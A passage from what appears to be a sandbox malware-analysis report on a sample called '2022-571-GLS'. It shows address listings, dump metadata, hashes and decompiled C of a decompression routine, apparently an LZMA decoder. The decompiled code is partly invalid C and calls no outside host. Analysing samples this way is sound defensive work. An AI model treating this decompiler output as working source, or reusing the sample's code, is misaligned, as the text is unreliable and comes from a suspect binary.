						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                          0x00000000
                          0x00406969
                          0x00406969
                          0x0040696d
                          0x00406992
                          0x0040699c
                          0x00000000
                          0x0040696f
                          0x0040696f
                          0x00406972
                          0x00406976
                          0x00406979
                          0x0040697c
                          0x00406980
                          0x00406980
                          0x00406983
                          0x00406a5d
                          0x00406a5d
                          0x00406a64
                          0x00406a64
                          0x00406a67
                          0x00406a6e
                          0x00406a9b
                          0x00406a9f
                          0x00406aff
                          0x00406b02
                          0x00406b07
                          0x00406b08
                          0x00406b0a
                          0x00406b0c
                          0x00406b0f
                          0x00406a1b
                          0x00406a1b
                          0x00406a1b
                          0x004061b7
                          0x004061b7
                          0x004061b7
                          0x004061c0
                          0x00000000
                          0x00000000
                          0x004061c6
                          0x00000000
                          0x004061d1
                          0x00000000
                          0x00000000
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e4
                          0x00000000
                          0x00000000
                          0x004061ea
                          0x004061ed
                          0x004061ef
                          0x004061f0
                          0x004061f3
                          0x004061f5
                          0x004061f6
                          0x004061f8
                          0x004061fb
                          0x00406200
                          0x00406205
                          0x0040620e
                          0x00406221
                          0x00406224
                          0x00406230
                          0x00406258
                          0x0040625a
                          0x00406268
                          0x00406268
                          0x0040626c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040625c
                          0x0040625c
                          0x0040625f
                          0x00406260
                          0x00406260
                          0x00000000
                          0x0040625c
                          0x00406236
                          0x0040623b
                          0x0040623b
                          0x00406244
                          0x0040624c
                          0x0040624f
                          0x00000000
                          0x00406255
                          0x00406255
                          0x00000000
                          0x00406255
                          0x00000000
                          0x00406272
                          0x00406272
                          0x00406276
                          0x00406b22
                          0x00000000
                          0x00406b22
                          0x0040627f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406295
                          0x00406295
                          0x00406298
                          0x0040629c
                          0x00000000
                          0x00000000
                          0x0040629e
                          0x004062a4
                          0x004062ce
                          0x004062d4
                          0x004062db
                          0x00000000
                          0x004062db
                          0x004062aa
                          0x004062ad
                          0x004062b2
                          0x004062b2
                          0x004062bd
                          0x004062c5
                          0x004062c8
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0040630d
                          0x00406313
                          0x00406316
                          0x00406323
                          0x0040632b
                          0x00000000
                          0x00000000
                          0x004062e2
                          0x004062e2
                          0x004062e6
                          0x00406b31
                          0x00000000
                          0x00406b31
                          0x004062f2
                          0x004062fd
                          0x004062fd
                          0x004062fd
                          0x00406300
                          0x00406303
                          0x00406306
                          0x0040630b
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069a2
                          0x004069a2
                          0x004069a8
                          0x004069ae
                          0x004069b4
                          0x004069ce
                          0x004069d1
                          0x004069d7
                          0x004069e2
                          0x004069e2
                          0x004069e4
                          0x004069b6
                          0x004069b6
                          0x004069c5
                          0x004069c9
                          0x004069c9
                          0x004069ee
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004069f0
                          0x004069f4
                          0x00406ba3
                          0x00000000
                          0x00406ba3
                          0x00406a00
                          0x00406a07
                          0x00406a0f
                          0x00406a12
                          0x00406a15
                          0x00406a15
                          0x00000000
                          0x00000000
                          0x00406333
                          0x00406335
                          0x00406338
                          0x004063a9
                          0x004063ac
                          0x004063af
                          0x004063b6
                          0x004063c0
                          0x00000000
                          0x004063c0
                          0x0040633a
                          0x0040633e
                          0x00406341
                          0x00406343
                          0x00406346
                          0x00406349
                          0x0040634b
                          0x0040634e
                          0x00406350
                          0x00406355
                          0x00406358
                          0x0040635b
                          0x0040635f
                          0x00406366
                          0x00406369
                          0x00406370
                          0x00406374
                          0x0040637c
                          0x0040637c
                          0x0040637c
                          0x00406376
                          0x00406376
                          0x00406376
                          0x0040636b
                          0x0040636b
                          0x0040636b
                          0x00406380
                          0x00406383
                          0x004063a1
                          0x004063a3
                          0x00000000
                          0x00406385
                          0x00406385
                          0x00406388
                          0x0040638b
                          0x0040638e
                          0x00406390
                          0x00406390
                          0x00406390
                          0x00406393
                          0x00406396
                          0x00406398
                          0x00406399
                          0x0040639c
                          0x00000000
                          0x0040639c
                          0x00000000
                          0x004065d2
                          0x004065d6
                          0x004065f4
                          0x004065f7
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x00406607
                          0x0040660a
                          0x0040660d
                          0x0040660f
                          0x00406616
                          0x00406617
                          0x00406619
                          0x0040661c
                          0x0040661f
                          0x00406622
                          0x00406622
                          0x00406627
                          0x00000000
                          0x00406627
                          0x004065d8
                          0x004065db
                          0x004065de
                          0x004065e8
                          0x00000000
                          0x00000000
                          0x0040663c
                          0x00406640
                          0x00406663
                          0x00406666
                          0x00406669
                          0x00406673
                          0x00406642
                          0x00406642
                          0x00406645
                          0x00406648
                          0x0040664b
                          0x00406658
                          0x0040665b
                          0x0040665b
                          0x00000000
                          0x00000000
                          0x0040667f
                          0x00406683
                          0x00000000
                          0x00000000
                          0x00406689
                          0x0040668d
                          0x00000000
                          0x00000000
                          0x00406693
                          0x00406695
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x004066a0
                          0x00000000
                          0x00000000
                          0x004066f0
                          0x004066f4
                          0x004066fb
                          0x004066fe
                          0x00406701
                          0x0040670b
                          0x00000000
                          0x0040670b
                          0x004066f6
                          0x00000000
                          0x00000000
                          0x00406717
                          0x0040671b
                          0x00406722
                          0x00406725
                          0x00406728
                          0x0040671d
                          0x0040671d
                          0x0040671d
                          0x0040672b
                          0x0040672e
                          0x00406731
                          0x00406731
                          0x00406734
                          0x00406737
                          0x0040673a
                          0x0040673a
                          0x0040673d
                          0x00406744
                          0x00406749
                          0x00000000
                          0x00000000
                          0x004067d7
                          0x004067d7
                          0x004067db
                          0x00406b79
                          0x00000000
                          0x00406b79
                          0x004067e1
                          0x004067e4
                          0x004067e7
                          0x004067eb
                          0x004067ee
                          0x004067f4
                          0x004067f6
                          0x004067f6
                          0x004067f6
                          0x004067f9
                          0x004067fc
                          0x00000000
                          0x00000000
                          0x004063cc
                          0x004063cc
                          0x004063d0
                          0x00406b3d
                          0x00000000
                          0x00406b3d
                          0x004063d6
                          0x004063d9
                          0x004063dc
                          0x004063e0
                          0x004063e3
                          0x004063e9
                          0x004063eb
                          0x004063eb
                          0x004063eb
                          0x004063ee
                          0x004063f1
                          0x004063f1
                          0x004063f4
                          0x004063f7
                          0x00000000
                          0x00000000
                          0x004063fd
                          0x00406403
                          0x00000000
                          0x00000000
                          0x00406409
                          0x00406409
                          0x0040640d
                          0x00406410
                          0x00406413
                          0x00406416
                          0x00406419
                          0x0040641a
                          0x0040641d
                          0x0040641f
                          0x00406425
                          0x00406428
                          0x0040642b
                          0x0040642e
                          0x00406431
                          0x00406434
                          0x00406437
                          0x00406453
                          0x00406456
                          0x00406459
                          0x0040645c
                          0x00406463
                          0x00406467
                          0x00406469
                          0x0040646d
                          0x00406439
                          0x00406439
                          0x0040643d
                          0x00406445
                          0x0040644a
                          0x0040644c
                          0x0040644e
                          0x0040644e
                          0x00406470
                          0x00406477
                          0x0040647a
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406480
                          0x00000000
                          0x00406485
                          0x00406485
                          0x00406489
                          0x00406b49
                          0x00000000
                          0x00406b49
                          0x0040648f
                          0x00406492
                          0x00406495
                          0x00406499
                          0x0040649c
                          0x004064a2
                          0x004064a4
                          0x004064a4
                          0x004064a4
                          0x004064a7
                          0x004064aa
                          0x004064aa
                          0x004064aa
                          0x004064b0
                          0x00000000
                          0x00000000
                          0x004064b2
                          0x004064b5
                          0x004064b8
                          0x004064bb
                          0x004064be
                          0x004064c1
                          0x004064c4
                          0x004064c7
                          0x004064ca
                          0x004064cd
                          0x004064d0
                          0x004064e8
                          0x004064eb
                          0x004064ee
                          0x004064f1
                          0x004064f1
                          0x004064f4
                          0x004064f8
                          0x004064fa
                          0x004064d2
                          0x004064d2
                          0x004064da
                          0x004064df
                          0x004064e1
                          0x004064e3
                          0x004064e3
                          0x004064fd
                          0x00406504
                          0x00406507
                          0x00000000
                          0x00406509
                          0x00000000
                          0x00406509
                          0x00406507
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x0040650e
                          0x00000000
                          0x00000000
                          0x00406549
                          0x00406549
                          0x0040654d
                          0x00406b55
                          0x00000000
                          0x00406b55
                          0x00406553
                          0x00406556
                          0x00406559
                          0x0040655d
                          0x00406560
                          0x00406566
                          0x00406568
                          0x00406568
                          0x00406568
                          0x0040656b
                          0x0040656e
                          0x0040656e
                          0x00406574
                          0x00406512
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00406515
                          0x00406576
                          0x00406576
                          0x00406579
                          0x0040657c
                          0x0040657f
                          0x00406582
                          0x00406585
                          0x00406588
                          0x0040658b
                          0x0040658e
                          0x00406591
                          0x00406594
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b5
                          0x004065b8
                          0x004065bc
                          0x004065be
                          0x00406596
                          0x00406596
                          0x0040659e
                          0x004065a3
                          0x004065a5
                          0x004065a7
                          0x004065a7
                          0x004065c1
                          0x004065c8
                          0x004065cb
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x004065cd
                          0x00000000
                          0x0040685a
                          0x0040685a
                          0x0040685e
                          0x00406b85
                          0x00000000
                          0x00406b85
                          0x00406864
                          0x00406867
                          0x0040686a
                          0x0040686e
                          0x00406871
                          0x00406877
                          0x00406879
                          0x00406879
                          0x00406879
                          0x0040687c
                          0x00000000
                          0x00000000
                          0x0040662a
                          0x0040662a
                          0x0040662d
                          0x0040699f
                          0x0040699f
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406a26
                          0x00406a2a
                          0x00406a48
                          0x00406a48
                          0x00406a48
                          0x00406a4f
                          0x00406a56
                          0x00000000
                          0x00406a56
                          0x00406a2c
                          0x00406a2f
                          0x00406a32
                          0x00406a35
                          0x00406a3c
                          0x00000000
                          0x00000000
                          0x00406b17
                          0x00406b1a
                          0x00406a1b
                          0x00406a1b
                          0x00000000
                          0x00000000
                          0x00406751
                          0x00406753
                          0x0040675a
                          0x0040675b
                          0x0040675d
                          0x00406760
                          0x00000000
                          0x00000000
                          0x00406768
                          0x0040676b
                          0x0040676e
                          0x00406770
                          0x00406772
                          0x00406772
                          0x00406773
                          0x00406776
                          0x0040677d
                          0x00406780
                          0x0040678e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406a73
                          0x00406a73
                          0x00406a77
                          0x00406baf
                          0x00000000
                          0x00406baf
                          0x00406a7d
                          0x00406a80
                          0x00406a83
                          0x00406a87
                          0x00406a8a
                          0x00406a90
                          0x00406a92
                          0x00406a92
                          0x00406a92
                          0x00406a95
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00406a98
                          0x00000000
                          0x00000000
                          0x00406796
                          0x00406799
                          0x004067cf
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x004068ff
                          0x00406902
                          0x00406902
                          0x00406905
                          0x00406907
                          0x00406b91
                          0x00000000
                          0x00406b91
                          0x0040690d
                          0x00406910
                          0x00000000
                          0x00000000
                          0x00406916
                          0x0040691a
                          0x0040691d
                          0x0040691d
                          0x0040691d
                          0x00000000
                          0x0040691d
                          0x0040679b
                          0x0040679d
                          0x0040679f
                          0x004067a1
                          0x004067a4
                          0x004067a5
                          0x004067a7
                          0x004067a9
                          0x004067ac
                          0x004067af
                          0x004067c5
                          0x004067ca
                          0x00406802
                          0x00406802
                          0x00406806
                          0x00406832
                          0x00406834
                          0x0040683b
                          0x0040683e
                          0x00406841
                          0x00406841
                          0x00406846
                          0x00406846
                          0x00406848
                          0x0040684b
                          0x00406852
                          0x00406855
                          0x00406882
                          0x00406882
                          0x00406885
                          0x00406888
                          0x004068fc
                          0x004068fc
                          0x004068fc
                          0x00000000
                          0x004068fc
                          0x0040688a
                          0x00406890
                          0x00406893
                          0x00406896
                          0x00406899
                          0x0040689c
                          0x0040689f
                          0x004068a2
                          0x004068a5
                          0x004068a8
                          0x004068ab
                          0x004068c4
                          0x004068c6
                          0x004068c9
                          0x004068ca
                          0x004068cd
                          0x004068cf
                          0x004068d2
                          0x004068d4
                          0x004068d6
                          0x004068d9
                          0x004068db
                          0x004068de
                          0x004068e2
                          0x004068e4
                          0x004068e4
                          0x004068e5
                          0x004068e8
                          0x004068eb
                          0x004068ad
                          0x004068ad
                          0x004068b5
                          0x004068ba
                          0x004068bc
                          0x004068bf
                          0x004068bf
                          0x004068ee
                          0x004068f5
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x0040687f
                          0x00000000
                          0x004068f7
                          0x00000000
                          0x004068f7
                          0x004068f5
                          0x00406808
                          0x0040680b
                          0x0040680d
                          0x00406810
                          0x00406813
                          0x00406816
                          0x00406818
                          0x0040681b
                          0x0040681e
                          0x0040681e
                          0x00406821
                          0x00406821
                          0x00406824
                          0x0040682b
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x004067ff
                          0x00000000
                          0x0040682d
                          0x00000000
                          0x0040682d
                          0x0040682b
                          0x004067b1
                          0x004067b4
                          0x004067b6
                          0x004067b9
                          0x00000000
                          0x00000000
                          0x00406518
                          0x00406518
                          0x0040651c
                          0x00406b61
                          0x00000000
                          0x00406b61
                          0x00406522
                          0x00406525
                          0x00406528
                          0x0040652b
                          0x0040652e
                          0x00406531
                          0x00406534
                          0x00406536
                          0x00406539
                          0x0040653c
                          0x0040653f
                          0x00406541
                          0x00406541
                          0x00406541
                          0x00000000
                          0x00000000
                          0x004066a3
                          0x004066a3
                          0x004066a7
                          0x00406b6d
                          0x00000000
                          0x00406b6d
                          0x004066ad
                          0x004066b0
                          0x004066b3
                          0x004066b6
                          0x004066b8
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066be
                          0x004066c1
                          0x004066c4
                          0x004066c7
                          0x004066ca
                          0x004066cb
                          0x004066cd
                          0x004066cd
                          0x004066cd
                          0x004066d0
                          0x004066d3
                          0x004066d6
                          0x004066d9
                          0x004066d9
                          0x004066d9
                          0x004066dc
                          0x004066de
                          0x004066de
                          0x00000000
                          0x00000000
                          0x00406920
                          0x00406920
                          0x00406920
                          0x00406924
                          0x00000000
                          0x00000000
                          0x0040692a
                          0x0040692d
                          0x00406930
                          0x00406933
                          0x00406935
                          0x00406935
                          0x00406935
                          0x00406938
                          0x0040693b
                          0x0040693e
                          0x00406941
                          0x00406944
                          0x00406947
                          0x00406948
                          0x0040694a
                          0x0040694a
                          0x0040694a
                          0x0040694d
                          0x00406950
                          0x00406953
                          0x00406956
                          0x00406959
                          0x0040695d
                          0x0040695f
                          0x00406962
                          0x00000000
                          0x00406964
                          0x004066e1
                          0x004066e1
                          0x00000000
                          0x004066e1
                          0x00406962
                          0x00406b97
                          0x00406bb9
                          0x00406bbf
                          0x00406bc1
                          0x00406bc8
                          0x00406bca
                          0x00406bd1
                          0x00406bd5
                          0x00000000
                          0x004061c6
                          0x00406bce
                          0x00406bce
                          0x00000000
                          0x00406bce
                          0x00406a1b
                          0x00406aa1
                          0x00406aa7
                          0x00406aaa
                          0x00406aad
                          0x00406ab0
                          0x00406ab3
                          0x00406ab6
                          0x00406ab9
                          0x00406abc
                          0x00406ac2
                          0x00406adb
                          0x00406ade
                          0x00406ae1
                          0x00406ae4
                          0x00406ae8
                          0x00406aea
                          0x00406aeb
                          0x00406aee
                          0x00406ac4
                          0x00406ac4
                          0x00406acc
                          0x00406ad1
                          0x00406ad3
                          0x00406ad6
                          0x00406ad6
                          0x00406af8
                          0x00000000
                          0x00406afa
                          0x00000000
                          0x00406afa
                          0x00406af8
                          0x00000000
                          0x0040696d

                          Memory Dump Source
                          • Source File: 00000000.00000002.305499046.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.305491871.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305515929.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305527626.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305565989.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305616553.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305629363.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.305634480.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2022-571-GLS.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                          • Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
                          • Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                          • Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040667F Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                          Download Yara Rule
                          C-Code - Quality: 98%
                          			E0040667F() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
						0 | _t258 = _t258 + _t258 + 9;
						 *(__ebp - 0x38) = _t258 + _t258 + 9;
						L75:
						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
